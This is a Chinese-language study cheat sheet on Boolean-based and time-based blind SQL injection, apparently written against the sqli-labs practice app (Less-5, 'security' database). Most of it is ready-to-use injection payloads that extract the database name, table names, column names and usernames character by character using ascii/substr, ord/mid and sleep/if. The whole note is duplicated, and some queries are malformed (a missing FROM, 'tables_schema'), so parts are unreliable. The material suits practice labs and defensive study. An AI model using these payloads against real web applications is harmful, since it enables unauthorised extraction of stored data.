SQL注入__布尔盲注和时间盲注(SQL injection__ Boolean blind injection and time blind injection)

SQL注入__布尔盲注和时间盲注

布尔盲注

猜测数据库
?id=1' and length(database())=8-- -
?id=1' and length(database())>8-- -
当前数据库第一位 截取数据库第一位 通过Ascii码值比较
id=1' and left(database(),1)>'a' -- - 
id=1' and left(database(),1)>'z' -- - 
在a-z之间
id=1' and left(database(),1)>'r' -- -
id=1' and left(database(),1)>'s' -- -
id=1' and left(database(),2)>'sa'-- -

猜测表
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a是从0开始第几个表,b是为第几个字符,n是ASCII所对应的十进制数
substr("abc",1,1) 切割函数  从第一位开始切割 切割第一个 返回a
substr("abc",2,1) 切割函数  从第一位开始切割 切割第一个 返回b
substr("abc",1,2) 从第一位开始切割 切割两位 返回ab
substr("abc",0,1)  #在PHP中是从0开始,MySQL中是从1开始
第一个表
ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
(select table_name information_schema.tables where tables_schema=database() limit 0,1)返回第一个表 
substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1)切割第一位
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))>102
第二个表
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101

判断user表

/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

爆出字段
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101
ord()绕过ascii()  mid()绕过substr()

sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

参考:https://blog.csdn.net/weixin_53324462/article/details/113800035

时间盲注

盲注
时间盲注
sleep(X)函数,延迟X秒后回显
?id=1' and sleep(5)-- -
if(判断语句,x,y)如果判断语句正确则输出X,否则输出Y
?id=1' and if(1=1,1,sleep(1))即输出1
?id=1' and if(1=2,1,sleep(1))即延迟1秒后回显

?id=1' and if(length(database())>8,sleep(2),0)
?id=1' and if(length(database())>=8,sleep(5),1)-- -
判断库名
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0) --+
?id=1' and if(ascii(substr(database(),1,1))>95,sleep(6),1)-- -
判断表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit x,y),z,d))=e,sleep(1),0)- --
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(2),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,sleep(3),0)--+

参考:https://blog.csdn.net/qq_51954912/article/details/116100446
————————

SQL injection__ Boolean blind injection and time blind injection

Boolean blind note

猜测数据库
?id=1' and length(database())=8-- -
?id=1' and length(database())>8-- -
当前数据库第一位 截取数据库第一位 通过Ascii码值比较
id=1' and left(database(),1)>'a' -- - 
id=1' and left(database(),1)>'z' -- - 
在a-z之间
id=1' and left(database(),1)>'r' -- -
id=1' and left(database(),1)>'s' -- -
id=1' and left(database(),2)>'sa'-- -

猜测表
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a是从0开始第几个表,b是为第几个字符,n是ASCII所对应的十进制数
substr("abc",1,1) 切割函数  从第一位开始切割 切割第一个 返回a
substr("abc",2,1) 切割函数  从第一位开始切割 切割第一个 返回b
substr("abc",1,2) 从第一位开始切割 切割两位 返回ab
substr("abc",0,1)  #在PHP中是从0开始,MySQL中是从1开始
第一个表
ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
(select table_name information_schema.tables where tables_schema=database() limit 0,1)返回第一个表 
substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1)切割第一位
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))>102
第二个表
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101

判断user表

/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

爆出字段
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101
ord()绕过ascii()  mid()绕过substr()

sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

参考:https://blog.csdn.net/weixin_53324462/article/details/113800035

Time blind injection

盲注
时间盲注
sleep(X)函数,延迟X秒后回显
?id=1' and sleep(5)-- -
if(判断语句,x,y)如果判断语句正确则输出X,否则输出Y
?id=1' and if(1=1,1,sleep(1))即输出1
?id=1' and if(1=2,1,sleep(1))即延迟1秒后回显

?id=1' and if(length(database())>8,sleep(2),0)
?id=1' and if(length(database())>=8,sleep(5),1)-- -
判断库名
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0) --+
?id=1' and if(ascii(substr(database(),1,1))>95,sleep(6),1)-- -
判断表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit x,y),z,d))=e,sleep(1),0)- --
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(2),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,sleep(3),0)--+

参考:https://blog.csdn.net/qq_51954912/article/details/116100446